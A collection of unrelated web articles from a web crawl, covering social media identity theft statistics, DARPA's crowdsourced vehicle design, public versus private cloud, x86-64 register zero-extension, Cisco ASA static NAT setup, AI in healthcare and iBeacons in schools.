The use of social media can increase consumer vulnerability to identity theft because of the amount and type of personal information people share on these networks. However, consumers do little or nothing to protect themselves, according to a recent study by the Ponemon Institute.
Although more than 80 percent of study respondents expressed concern about their security while using social media, more than half of these same individuals admitted they do not take any steps to actively protect themselves.
This data clearly demonstrates that while people may acknowledge that security is important, many do nothing to protect their information online.
Other key findings from the survey include the following:
- Approximately 65 percent of users do not set high privacy or security settings in their social media sites.
- Approximately 40 percent of all respondents share their physical home address through social media applications.
- Surprisingly, people who have been victims of identity theft are just as likely to be lax in securing their personal information online. Study results from identity theft victims and non-victims are virtually identical.
Even though most respondents expressed concern about online security and privacy, nearly 90 percent did not feel that identity theft is a likely risk from using social media sites. Accordingly, individuals continue to use social media despite acknowledged potential dangers.
- More than 60 percent of users are either not confident or unsure of their social media provider’s ability to protect their identity
- Approximately 44 percent of individuals said if they discovered that a social media provider did not adequately protect their privacy or security, they would continue to use the site
- Nearly 60 percent of respondents are either not confident or unsure that their network of social media friends only includes people they know and can trust. | <urn:uuid:e3097bcc-8b7a-4800-a4f9-674084e36682> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2010/06/21/the-truth-about-social-media-identity-theft/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00572-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93851 | 335 | 3.15625 | 3 |
State and local governments have learned about the benefits of crowdsourcing and today use the power of the public to get new ideas, speed up development times and launch new applications. But the federal government is using crowdsourcing too -- to develop their design tools and build a tank. The Defense Advanced Research Projects Agency (DARPA) started a new program called Adaptive Vehicle Make (AVM), which includes using the public to test the agency’s design tools and submit their designs. More than 1,000 people contributed their powertrain and suspension designs to the first phase of the "Fast, Adaptable, Next-Generation Ground Vehicle" (FANG) project, a challenge to build an amphibious attack vehicle.
The first phase of the FANG challenge ended on April 15. On April 22, a winner was chosen and awarded a one million dollar prize. The next phase of the project, FANG 2, will begin in 2014 and focus on the chassis and survivability of the vehicle. In 2015, FANG 3 will focus on designing an entire vehicle from scratch.
While state and local governments have found crowdsourcing an effective way of engaging citizens and setting budget priorities, DARPA is using crowdsourcing as a way to speed up the development process while refining its design tools. “AVM is ultimately all about how do we compress that development timeline of a complex system for military application,” said Army Lt. Col. Nathan Wiedenman, AVM program manager. “For me and for DARPA, the challenge was an opportunity to put the tools at their current state of development through their paces, test them at scale, get a lot of eyes looking at them and help us make them better. But we will continue to develop those tools and expand their capability over the future design iterations of FANG 2, FANG 3.”
The tools offered by DARPA include design, development, and verification software tools. Participants from the public design and model their concepts and get feedback from an analytical and manufacturability standpoint. While FANG is being used as a guinea pig to develop the AVM program, it may eventually be refined to meet the standards of the Marine Corps, Wiedenman said.
Now that the first phase of the FANG challenge is complete, the DARPA build team based at Penn State University is working on building their design. “Ordering the parts, materials, getting labor online to build that, actually put it through its paces, put it through physical testing and feed that information coming out of the testing, that empirical test data, back into how well the tools can represent and predict the expected performance behavior of the subsystem being designed.”
Using crowdsourcing may prove to bring costs down, but for now, Wiedenman said, the AVM program is mainly being used as a way to test tools more quickly. Overall, he reports that the program is going as planned.
“We got a lot of feedback, obviously not all of it rainbows and sunshine,” he said. “This is a research and development project and the tools are under development so there are rough edges that we’re continuing to work out, but in general I think the feedback was extremely helpful," Wiedenman added, noting that comments were mostly positive and participants had a good experience.
Image courtesy of DARPA Adaptive Vehicle Make Program. | <urn:uuid:283081b9-7662-4891-8152-94f1d71ca4c4> | CC-MAIN-2017-04 | http://www.govtech.com/technology/Public-Joins-DARPA-In-Tank-Design.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00388-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964185 | 699 | 2.625 | 3 |
GCN LAB IMPRESSIONS
Can talking about technology make you smarter?
- By Greg Crowe
- Jun 27, 2011
You can debate whether technology makes us smarter or just gives us more data to process. But apparently, talking about technology could actually improve the human brain.
New findings released by archaeologists at Lund University in Sweden indicate that developing, or even communicating about, new technologies has led to changes in the way we think and behave as a species.
They discovered that, although Homo sapiens have lived on the planet for about 200,000 years, it was only about 100,000 years ago that advanced tool-making technology, for crafting things such as spearheads, came about.
In order to reach that plateau, the study says, increased social interaction had to occur, and over generations, the actual makeup of our brains altered. So, in essence, people getting together, planning and talking about technology had a positive impact on the physical structure of our brains — that is, talking about it made us naturally smarter.
And each generation was more adapted to the new technology than the last and, hence, smarter still.
Evidence of this exists today. Anyone who has ever witnessed a preteen teaching his or her grandparents how to get online to check their e-mail or even program their digital video recorder will tell you that the new generation tends to be more tech-savvy than the one before it.
Some could argue that it is simply that younger generations are exposed to technology at an earlier age, thus making them more practiced. And although that might be true to a certain extent, these new findings seem to indicate that there is also a biological predilection for younger generations to be smarter than older ones.
Of course, any live experiment to prove this would no doubt involve raising control subject children in isolation and periodically introducing technology to them to see what they do with it. And that would probably get the torch-and-pitchfork crowd chasing after the scientist in charge of said experiment.
But if anyone does decide to run such an experiment, it would be an ideal environment to also run my long-term cell phone exposure effects experiment. Wait...torches...pitchforks...on second thought, forget I said anything.
So in light of these new findings, the staff here at GCN will continue doing what we have done for the past 29 years: talk about technology and contribute to ultimately making the human species smarter.
You are welcome.
Greg Crowe is a former GCN staff writer who covered mobile technology. | <urn:uuid:2ce76044-2a6f-48c4-8418-2df0bc406980> | CC-MAIN-2017-04 | https://gcn.com/articles/2011/06/27/talking-about-technology-makes-you-smarter.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00232-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963469 | 522 | 2.734375 | 3 |
Cloud computing has become ubiquitous for businesses of all sizes, and it offers benefits around scalability, ease of use, fast time-to-market and flexible costs. But cloud isn’t a one-size-fits-all solution, and different workloads perform better in different infrastructure configurations.
IT teams and business decision makers are tasked with determining which type of cloud will work best for their technology requirements, while also finding cloud providers that offer a wide range of deployment options. Understanding the difference between public cloud and private cloud is critical to making the right infrastructure decisions.
Definitions: Public cloud vs private cloud
How do you decide which cloud option is right for you? Let’s look at the definition of public and private cloud along with a few use case examples.
Public cloud allows customers to instantly provision cloud instances via an online portal. As a utility compute model, public cloud provides an accessible, cost-effective deployment option available on a pay-as-you-go basis with no upfront investment required.
The flexible billing model with no contract commitment is beneficial for small businesses and other organizations that may only need a cloud server for a limited amount of time, such as for development or testing purposes. The scalability and elasticity offered by public cloud can accommodate changing workload sizes and allow customers to spin servers up and down as needed.
Customization & control
The public cloud is a multi-tenant environment where the hardware and network resources are shared across customers. All hardware and associated networking are located in a data center where they are maintained by the cloud service provider, which reduces the management burden on the customer. However, because of the commoditized nature of public clouds, customization and control is limited. This can be problematic for organizations with strict security or compliance requirements if the cloud provider doesn’t offer specific hardware or operating systems that meet the company’s needs.
Public cloud offerings are typically viewed as virtualized instances, but in recent years, some providers have begun offering both virtual and bare-metal cloud. Bare-metal servers are not virtualized and do not have a hypervisor, which allows organizations to customize the server to their specifications. Cloud computing operating systems such as OpenStack offer the ability to create and manage cloud instances from the same online management portal.
Common use cases for public cloud include web servers, testing and development, and other scenarios where enhanced security requirements are not needed.
Private cloud offers a single-tenant environment where hardware, network and IT equipment is entirely dedicated to one customer. While the initial investment and ongoing maintenance for private cloud is more expensive than public cloud, organizations have the ability to customize their environment to meet exact specifications.
A highly customized, dedicated environment is often required by businesses that must adhere to industry-wide security or compliance regulations, such as HIPAA, HITECH or PCI-DSS. To be compliant, many healthcare, finance and ecommerce companies are required to have an infrastructure with higher levels of data protection and security than a commodity public cloud can provide.
Private cloud hosting solutions give customers significant control over their environment, including the hardware, operating system and other equipment. However, increased customization and control also shifts the burden of maintenance and management to the customer. This is one of the main trade-offs between public and private cloud; organizations that require more hands-on access and customization must also take on the responsibility of managing it.
Common use cases for private cloud include secure online systems with controlled access, protection of personally identifiable information and credit card data, and meeting compliance requirements around HIPAA, HITECH or PCI-DSS.
A hybrid approach
Public cloud and private cloud are not mutually exclusive, and most businesses need to use a mix of different infrastructure solutions to meet workload and application requirements. Hybrid cloud solutions refer to any combination of public, private, third-party or on-premise cloud services within the same environment.
Using one provider that offers public, private and hybrid cloud can be a cost-effective way to meet scalability, performance and security requirements. If an organization is transferring data between a private cloud located in California and a public cloud facility in New York, the latency created by distance can impact network performance. Choosing a provider that offers private and public clouds in close proximity to each other or even within the same facility can reduce latency and improve performance throughout the infrastructure stack.
So how can you determine which type of cloud is best for your needs? Download the Cloud Buyer’s Guide to learn more. | <urn:uuid:0ba05fbb-74b0-4521-8754-20efe130be31> | CC-MAIN-2017-04 | http://www.internap.com/2016/01/28/public-cloud-vs-private-cloud/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00380-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939089 | 920 | 2.53125 | 3 |
A few days ago I was working on the x86 IDA module. The goal
was to have it recognize jump tables for 64-bit processors.
This is routine: we have to add new instruction idioms to the
analysis engine from time to time to keep up with new compilers.
I was typing in the patterns and hoping
that the tests would go smoothly at the first run.
But one of the patterns puzzled me. It didn’t look good. Such code could not run
and would randomly crash: the processor was using a register without fully
initializing it. Yet I knew that the code worked, since it came from a real-world
application. Besides, the code was compiler-generated, and such code is usually
very robust.
The code was using the movzx instruction to copy a value from one register
to another. Something like this:
movzx eax, bl
Here the value in the bl register (8 bits) is copied to the eax register (32 bits).
The upper 24 bits of the eax register are set to zero during the copy.
After that the code was using the rax register (64-bit):
mov eax, offset[rcx+rax*4]
However, the high 32 bits of the rax register are not initialized and may contain anything!
Code like this is doomed to crash… how come it works?!
I think you guessed it: the movzx instruction initializes the whole rax register.
Its companion instruction, movsx, behaves even more strangely. For example,
if rax=-1 and bl=0x80, after the execution of
movsx eax, bl
rax is equal to 0x00000000FFFFFF80.
Igor Skochinsky solved this mystery for me. It turns out that the results of
all 32-bit computations in 64-bit mode are silently zero-extended to 64 bits.
(Note for the future: always read the manuals from the first to the last page! 😉)
I don’t know why 32-bit destinations are singled out (16-bit and 8-bit results
are not zero-extended), but it is nice to know about this particularity of x86 processors.
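The semantics are easy to double-check outside of assembly. Here is a small Python model of the two instructions, with register widths emulated by bit masks (the function names are just illustrative labels, not real instruction mnemonics):

```python
def movzx_eax_bl(bl):
    """movzx eax, bl: zero-extend bl (8 bits) into eax (32 bits).
    Writing eax implicitly clears the upper 32 bits of rax too."""
    return bl & 0xFF

def movsx_eax_bl(bl):
    """movsx eax, bl: sign-extend bl to 32 bits; the implicit
    zero extension of the upper 32 bits of rax still applies."""
    eax = (bl & 0xFF) | (0xFFFFFF00 if bl & 0x80 else 0)
    return eax & 0xFFFFFFFF

rax = 0xFFFFFFFFFFFFFFFF           # rax = -1
rax = movzx_eax_bl(0x80)
print(hex(rax))                    # 0x80 -> whole rax is 0x0000000000000080
rax = movsx_eax_bl(0x80)
print(hex(rax))                    # 0xffffff80 -> rax = 0x00000000FFFFFF80
```

Note how the second result matches the 0x00000000FFFFFF80 value above: the sign extension stops at bit 31, and bits 32–63 are zeroed rather than filled with the sign.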
Planning a Shared Folder Structure
When you're creating a new network or installing a new file or application server, it's easy to get confused about how to share the resources on the server. There are a couple of schools of thought on the subject. Some administrators like to share everything at the root level and allow NTFS permissions to control access to individual folders. Other administrators prefer to share each data directory or application folder individually. I prefer to use a mixture of these two techniques. In this article, I'll share my thoughts on the subject with you.
Sharing at the Root vs. Sharing Individually
Ideally, your goal is to make the appropriate resources available to the necessary people, while protecting the resources from those who shouldn't be allowed to have access. While both of the techniques that I described above work, they both have flaws when you consider them in terms of your goal.
The situation in which everything is shared individually has problems because each share point is a resource that the server must track. Having too many shares can consume large amounts of memory and processing power, thus slowing your server down. The other danger of such an arrangement is that it's easy to accidentally overlap shares. For example, suppose that you had a directory called \DATA\A. Now, suppose that you gave the user full access to DATA and read-only access to A using share-level permissions. In such a situation the shares would overlap because A is a subdirectory of DATA. If the user tried to access the A directory through the A share, they would receive the appropriate read-only permissions. If they attempted to go in through the DATA share and drill down to the A directory, they would have full access because of the permissions assigned to the DATA share.
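The overlap problem can be made concrete with a small sketch. A user's effective rights through a share are the more restrictive of the share permission and the NTFS permission, so the same folder can yield different rights depending on which share the user enters through (the permission names and helper below are illustrative, not a Windows API):

```python
PERM_ORDER = {"none": 0, "read": 1, "change": 2, "full": 3}

def effective_access(share_perm, ntfs_perm):
    """Effective rights = the more restrictive of share and NTFS permissions."""
    return min(share_perm, ntfs_perm, key=PERM_ORDER.get)

# NTFS grants the user full control over \DATA\A in both cases.
via_A_share    = effective_access("read", "full")   # entered through share A
via_DATA_share = effective_access("full", "full")   # entered through share DATA

print(via_A_share, via_DATA_share)  # read full -- same folder, different rights
```

This is exactly why handling security once, at the NTFS level, is less error-prone than juggling overlapping share-level permissions.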
On the other extreme, only having a single share point for each volume and using NTFS to handle security isn't that bad of an idea. However, this approach may make it difficult to navigate to a desired location within the directory structure. Although this approach might work fine for you and for some users, it's not a bad idea to make things easy on the rest of the users by creating a few share points that they can use to directly access frequently used folders. With this approach, it's appropriate to use NTFS permissions instead of share permissions. Whenever I create a share point, I like to set the share permissions to allow everyone to have full access. I handle the security at the NTFS level.
Where to Create Shares
When it comes to creating shares, I usually create one share for each major directory tree or application. For example, suppose that you have a directory called USERS that contains a subdirectory for each user in the domain. I'd create a share point on the USERS directory so that any user can click on it and then go straight to their data directory. Likewise, if you had a directory that contained the setup files for Microsoft Office, it's not a bad idea to create a share point for that directory. That way, if a user needs to install an optional Microsoft Office component, there's no question about where that component is located.
Brien M. Posey is an MCSE who works as a freelance writer. His past experience includes working as the director of information systems for a national chain of health care facilities and as a network engineer for the Department of Defense. Because of the extremely high volume of e-mail that Brien receives, it's impossible for him to respond to every message, although he does read them all. | <urn:uuid:e4b8cc6b-3ac2-4b94-8dc9-4c0501e4649d> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsysm/article.php/624941/Planning-a-Shared-Folder-Structure.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00434-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958993 | 720 | 2.640625 | 3 |
Imagine you just got a cancer diagnosis. You speak with four highly-regarded physicians and get four conflicting recommendations: chemo, radiation therapy, surgery, and one opinion that recommends a combination of allopathic and complementary medicine. “It would be confusing and hard to make a choice because faced with a cancer diagnosis, if you choose the wrong treatment, you might die. It’s scary,” says Tamara McCleary, the CEO of Thulium.co and futurist who began her career as a registered nurse.
“When you and I get sick, we rely on doctors’ memory, their education, their personal biases, and their emotional state. We are even relying on whether they got enough sleep last night,” McCleary says. “There are all these human variables that can cause any of us to not be top of our game at any point in time—night or day. It is not a criticism. We are human. Human beings make errors.”
Now, picture a world in which doctors are trained in data science. Armed with machine learning, big data, and artificial intelligence, they can consider clinical research from across the globe, weighing the latest research and clinical data in each decision they make. Physicians could consider the likelihood that every possible treatment modality would work for each individual. And they can use technology to base each medical decision on the latest research data available, a patient’s genomics, lab results, and clinical history.
Machines could also weed out ineffective but expensive treatments and help detect the earliest signs of disease. “We can head off problems if we can intervene earlier,” McCleary says. “We know that early intervention is the key to staying healthy, as well as the key to saving healthcare dollars.”
Saving money is crucial. In the United States, medical bills are one of the most common causes of bankruptcies.
“I think that the healthcare industry is primed to be disrupted,” McCleary says. “We are still functioning in an outdated model. Whether the institution of healthcare wants to change or not, it’s buckling under the weight of the financial crisis of rising healthcare costs, and an aging baby boomer population. Technology that can save lives and dollars is the catalyst for disruption in the healthcare sector.”
There are already a number of companies launching artificial intelligence technology in healthcare, ranging from IBM, with its Watson technology, to startups like Enlitic, Wellframe, Ginger.io, MedAware, and Lumiata.
The potential for AI and IoT for the elderly is staggering. The number of Americans that are 65 or older will increase from 35 million in 2000 to 73 million by 2030, predicts the U.S. Census Bureau.
The aging population in the U.S. may already be behind the nation’s stubbornly slow economic growth, argues a team of researchers—Etienne Gagnon, Benjamin Johannsen, and David Lopez-Salido—in a recent paper for the Federal Reserve.
Complicating matters, caring for the elderly can be notoriously expensive as well. A private nursing home room can cost anywhere from $55,000 to $255,000 annually, according to government data. Healthcare spending at large is also a drag on the U.S. economy. In 2014, the country spent 17.5% of its GDP on healthcare expenditures. That works out to nearly $10,000 per person. Meanwhile, outcomes in the United States lag behind most other industrialized nations.
The majority of boomers would prefer to stay in their homes as they age rather than move into a facility. Yet many people—elderly and otherwise—struggle to take their medication as prescribed. U.S. doctors prescribe roughly 3.8 billion drugs annually—half of which are taken incorrectly or are not taken at all. Among the elderly, this noncompliance is the most common reason for admittance to nursing homes.
“Imagine the freedom and independence that personal robots could offer the elderly. Medication and safety problems are the most prominent reasons aging persons are displaced from their homes and placed in care facilities. A personal AI could offer reminders to take medication and even dispense the correct meds,” McCleary says. “Take it a step further with IoT, we have the technology currently where pills have tiny sensors. As the medication is digesting in the patient, it allows family members and physicians to know that the patient took their medication. It’s even time stamped. If they didn’t take it, or took the wrong dosage, an alert would be sent.”
These technologies hold promise for everyone but especially for the elderly and those with chronic disease.
McCleary thinks healthcare needs machines to manage the details of caregiving, collecting and reporting important health-related data. Technology can also support patient compliance and provide predictive analytics to keep patients healthier while reducing rising healthcare costs. “Machines will free-up providers to do what they do best,” she says. “Doctors and nurses are critical for preserving the human touch in medicine through a personalized approach to care. When we’re sick, scared, and suffering we need a human being to talk to. Machines free-up doctors and nurses from the things they don’t need to be occupied with, and instead focus on the most important thing of all—human-to-human relationships between care provider and patient.”
“There is this beautiful, unexplainable, human reasoning. When paired with the tools that machines can offer us, it’s better than what we can do alone,” she says. “In the end, everything is about relationships. It is human-to-human relationships, but it is also human-to-machine relationships, and machine-to-machine relationships, and machine to human relationships. These are the relationships we are going to navigate in the future.”
In the end, healthcare, too, is all about relationships. The complex web of relationships spans public and private payers, industry, clinicians, patients, and more. This complexity will likely prohibit healthcare from having a singular 'Uber moment.' But change is coming nonetheless. And each of us can play a role in making it happen. | <urn:uuid:04abcc24-e98b-4676-a4e5-070b4bcbe8cd> | CC-MAIN-2017-04 | http://www.ioti.com/iot-trends-and-analysis/call-911-healthcare-needs-tech-resuscitation | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00123-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953491 | 1,344 | 2.65625 | 3 |
Energy efficient LED light bulbs are increasingly replacing incandescent bulbs and, while there are many technical and market challenges to resolve, it is clear that new capabilities and functionalities that transcend far beyond the traditional light bulb are emerging. The future of lighting is changing and taking effect now.
The emergence of smart city programs is putting the smart street lighting at the forefront of municipality roadmaps. Smart lighting solutions will enable cities to cover streets with the correct amount of light, depending on the conditions for which it is needed. While these solutions provide municipalities with the right tools to improve citizens’ satisfaction in terms of security, safety, and wellbeing, they also enable councils to make considerable savings in terms of power consumption and lighting system maintenance. In addition, outdoor lighting infrastructure will increasingly serve as a backbone that will carry a number of IoE applications including monitoring changes in weather, pollution rates, and mapping traffic conditions and flow in specific areas of the city.
Off the back of this, other public domains such as office blocks, retailers, and manufacturing plants are starting to look towards smart, connected lighting to better the working environment for their employees, while also improving productivity and customer experience. Much like smart street lighting, businesses will also see the benefits of energy savings and remote lamp monitoring.
In the residential market, homeowners can, among other things, personalize their smart lights to a color representative of their activity or mood, and remotely control timers to welcome them home or to feign occupancy. These advantages of smart LEDs in the home will aid in the drive towards greater LED usage.
This comprehensive forecasting model takes into account the installed bases of residential and street lighting, as well as a range of different public segments, in various regions around the world. The model looks at how the market is moving towards LEDs and their smart capabilities as well as the evolution of the technologies which are used. | <urn:uuid:eb2c32c2-adf8-4e3f-8703-316f74235705> | CC-MAIN-2017-04 | https://www.abiresearch.com/market-research/product/1026351-smart-lighting/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283301.73/warc/CC-MAIN-20170116095123-00031-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.958417 | 376 | 2.734375 | 3 |
Two of the most common forms of network address translation (NAT) are dynamic port address translation (PAT) and static NAT.
PAT is the many-to-one form of NAT implemented in many small office and home networks where many internal hosts, typically using RFC 1918 addresses such as 192.168.0.0/24, share a single external address on the public Internet. Static NAT is a one-to-one mapping which is used when an internal host needs to be accessible from the public Internet or some other external network.
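The many-to-one idea behind PAT can be sketched as a translation table: each internal (address, port) pair is mapped to the single public address plus a uniquely allocated outside port. The addresses and port range below are purely illustrative, not drawn from the configurations in this article:

```python
import itertools

PUBLIC_IP = "203.0.113.1"            # the one shared external address
_ports = itertools.count(20000)      # pool of outside ports to hand out
_table = {}                          # (inside_ip, inside_port) -> outside_port

def translate_out(inside_ip, inside_port):
    """Map an internal flow onto the shared public address.

    A flow keeps its allocated port for its lifetime, so return
    traffic can be matched back to the right internal host.
    """
    key = (inside_ip, inside_port)
    if key not in _table:
        _table[key] = next(_ports)
    return PUBLIC_IP, _table[key]

print(translate_out("192.168.0.10", 51000))  # ('203.0.113.1', 20000)
print(translate_out("192.168.0.11", 51000))  # ('203.0.113.1', 20001)
print(translate_out("192.168.0.10", 51000))  # reuses ('203.0.113.1', 20000)
```

Static NAT, by contrast, is a fixed one-to-one entry in the same kind of table, which is what lets outside hosts initiate connections inward.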
In this article I'll explain how to configure static NAT to make an internal Web server accessible from an external network. The same concept applies when you want to make any internal server accessible from an external network, whether it's a Web server, a mail server, an FTP server, or any other type of server or device.
Use the following diagram with this documentation. This diagram uses RFC 1918 addresses. In the real world, the outside interface would most likely be configured with a registered, public address.
There are four steps involved in enabling static NAT:
1. Create the network object and static NAT statement. A network object must be created identifying the internal host. Within the network object, you must also create a static NAT statement to identify the outside interface, its IP address, and the type of traffic to be forwarded:

object network InternalHost
host 192.168.102.5
nat (inside,outside) static interface service tcp 80 80
2. Create a NAT statement identifying the outside interface. Note that, in the static NAT statement above, the use of the term interface tells NAT to use whatever address is on the outside interface. The first use of 80 identifies the originating port number. The second use of 80 identifies the destination port number.
3. Build the Access-Control List. Build the Access-Control List to permit the traffic flow (this statement goes on a single line):

access-list OutsideToWebServer permit tcp any host 192.168.102.5 eq www
4. Apply the ACL to the outside interface using the Access-Group command:

access-group OutsideToWebServer in interface outside

This is the complete configuration:
When successfully implemented, this configuration will permit a host on the outside network, such as the public Internet, to connect to the internal Web server using the address on the ASA's outside interface.
Configuring the ASA with multiple outside interface addresses
It is not possible to assign multiple IP addresses to the outside interface on a Cisco ASA security appliance. It is possible, however, to configure the ASA to forward different outside addresses to different hosts on the inside network.
For example, you have a /29 block of addresses assigned by your ISP. Also, suppose you have a mail server using POP3 and SMTP and a Web server using HTTP and HTTPS on the inside network. You want each of the servers to be reachable via different outside addresses. You can configure static NAT to accomplish this (see diagram, and again, in the real world the outside interface would probably be configured with registered, public addresses instead of the RFC 1918 addresses shown here).
The steps are similar for single-address static NAT configuration:
1. Configure network objects. Configure a network object for each internal host with a static NAT statement specifying the outside address to be used and the service types (port numbers) to be forwarded. These identify the internal hosts, the desired outside IP address, and the type of service to be forwarded. (The exclamation marks are for formatting to improve readability and are not required for the configuration.)
object network WebServer-HTTP
host 192.168.102.5
nat (inside,outside) static 192.168.1.194 service tcp 80 80
!
object network WebServer-HTTPS
host 192.168.102.5
nat (inside,outside) static 192.168.1.194 service tcp 443 443
!
object network MailServer-SMTP
host 192.168.102.6
nat (inside,outside) static 192.168.1.195 service tcp 25 25
!
object network MailServer-POP3
host 192.168.102.6
nat (inside,outside) static 192.168.1.195 service tcp 110 110
Note that in the above configurations the host statement identifies the internal server (192.168.102.5 is the Web server and 192.168.102.6 is the mail server). The NAT statement identifies the external address used to forward the specified packets to the internal host.
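Conceptually, those object/NAT statements build a one-to-one forwarding map keyed on the outside address and port. A small sketch of the resulting lookup, using the article's addresses (the function itself is illustrative, not ASA behavior code):

```python
# (outside_ip, port) -> (inside_ip, port), mirroring the object NAT statements
STATIC_NAT = {
    ("192.168.1.194", 80):  ("192.168.102.5", 80),   # WebServer-HTTP
    ("192.168.1.194", 443): ("192.168.102.5", 443),  # WebServer-HTTPS
    ("192.168.1.195", 25):  ("192.168.102.6", 25),   # MailServer-SMTP
    ("192.168.1.195", 110): ("192.168.102.6", 110),  # MailServer-POP3
}

def translate_in(dst_ip, dst_port):
    """Return the inside destination, or None if no static entry matches."""
    return STATIC_NAT.get((dst_ip, dst_port))

print(translate_in("192.168.1.195", 110))  # ('192.168.102.6', 110)
print(translate_in("192.168.1.194", 22))   # None -- not forwarded
```

Anything not in the map simply is not forwarded, which is why the ACL in the next step only needs to permit the four flows you actually published.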
2. Configure Access-Control Lists to permit the traffic flows. This Access-Control List permits the traffic flows against the security levels (each access-list statement goes on a single line).
access-list OutsideToInside permit tcp any host 192.168.102.5 eq 80
access-list OutsideToInside permit tcp any host 192.168.102.5 eq 443
access-list OutsideToInside permit tcp any host 192.168.102.6 eq 25
access-list OutsideToInside permit tcp any host 192.168.102.6 eq 110
3. Apply the Access-Control List to the outside interface with an access-group statement.
access-group OutsideToInside in interface outside
Here is the complete configuration:
For more information about configuring the Cisco ASA Security Appliance, please see my book "The Accidental Administrator: Cisco ASA Security Appliance," available through Amazon and other resellers or through the soundtraining.net bookstore. Also, consider attending my Cisco ASA Security Appliance 101 workshop, either a public, open-enrollment workshop or available for onsite training at your location with your group. More information is available here. | <urn:uuid:c2edd28d-06e5-4890-9ef1-9be3007c30a4> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2162844/tech-primers/how-to-configure-static-nat-on-a-cisco-asa-security-appliance.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00151-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.837777 | 1,154 | 3.6875 | 4 |
Now You See It: Simple Visualization Techniques for Quantitative Analysis by Stephen Few.
Before you can present information to others, you must know its story. Now You See It teaches simple, fundamental, and practical techniques that anyone can use to make sense of numbers. These techniques rely on something that almost everyone has—vision—using graphs to discover trends, patterns, and exceptions that reside in quantitative information and interactions with those graphs to uncover what the discoveries mean.
Although some questions about quantitative data can only be answered using sophisticated statistical techniques, most can be answered using simple visualizations—quantitative sense-making methods that can be used by people with little statistical training. Until Now You See It, no book has taught the basic skills of data analysis to such a broad audience and for so many uses, even though the need is huge, critical, and rapidly growing.
You may download a PDF version of the table of contents.
Teachers who wish to consider Now You See It for a course and journalists who wish to review it may request a review copy by emailing Stephen Few directly.
Buy Now You See It. To order 10 or more copies, please email us for information and pricing (we offer discounts on such purchases). | <urn:uuid:20907042-5312-4196-b21c-86fbc70c25bc> | CC-MAIN-2017-04 | http://www.analyticspress.com/nysi.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00545-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.910787 | 250 | 2.96875 | 3 |
With the advent of iOS 7 came a new technology from Apple called iBeacons. iBeacons provide a significant step forward in the “internet of things.” As technology becomes a more central part of our lives, our devices start to talk to each other more and iBeacons help a device figure out what's nearby and what it can talk to. The context of a device’s location helps make decisions for how devices interact with each other. iBeacons provide a solution to make those decisions, replacing what traditional GPS services have done in the past.
With traditional GPS services, the data is often inaccurate and the service can make inappropriate decisions. School buildings are notorious for interfering with location services, providing location data that is seldom accurate. GPS services do not include things like altitude, so even when the coordinates are correct, it doesn't understand if you are on the 2nd floor or 3rd floor of the high school. Traditional GPS services also carry a liability in student privacy. The service has the potential to save data long term, creating a historical tracking of that device and the student using it, which has been a roadblock for many.
ABCs of iBeacons
iBeacons offer great advantages over traditional location services. Instead of using the device’s specific geographic location (GPS coordinates), iBeacons use a device’s proximity to an iBeacon region. Similar to how Grover taught on Sesame Street, an iBeacon knows what devices are "near" and what's "far."
This is a major shift in the approach to the accuracy problem. Instead of constantly sending location data to a service, a device only communicates when it is in one of these regions. This removes liability, as the service no longer knows where devices are, only that the device is in a region it cares about.
As accurate as it gets
iBeacons are also far more accurate, even in buildings with many walls that block communications to a GPS satellite. Because they're merely finding when a device is near, iBeacons provide accuracy to about one centimeter — even between floors in a building.
This accuracy has been a draw for the retail environment, and is one of the primary applications of iBeacons. Retailers are using iBeacons to serve content to shoppers based on what items they’re viewing at the time. Maybe a description of that product will appear on their phones, or some complementary products will be shown.
Simplifying device management
With the Casper Suite, organizations can apply that same technology and accurate context to their device management needs. As an IT administrator, our primary task is to ensure that the end user has access to the content and tools needed to be successful with their immediate tasks.
In an education setting, we make these decisions based on criteria like grade level, primary focus area, or even the class a student is in at the time. For example, when preparing devices for a math student, we’d consider deploying graphing calculators, the course syllabus, and Donald Duck in Mathmagic Land. This process is part of device management and iBeacons can simplify this process for the entire IT administration team and students alike.
Students get the materials they need
iBeacons allow us to create policies and guidelines for how a device should behave based on the context of which region it is in. So when a student takes their device to math class, they automatically see the syllabus, the Volume Purchase Program (VPP) distributed graphing calculator, and Donald Duck in Mathmagic Land right in Self Service.
They can access it when they need it, or download it for constant access to that content. Teachers can take their class to the library and each student can automatically see the content they need right on their devices without having to sort through eBooks that aren’t applicable to the class they’re in at the time.
In the classroom, students can automatically gain access to the Apple TV without knowing the passwords, in order to collaborate with each other and the entire class without losing instructional time.
Tremendous upside for education
The applications of iBeacons to the classroom are endless. Paired with the integration in the Casper Suite, your district will save device configuration time and be afforded the time to investigate modification and redefinition technology.
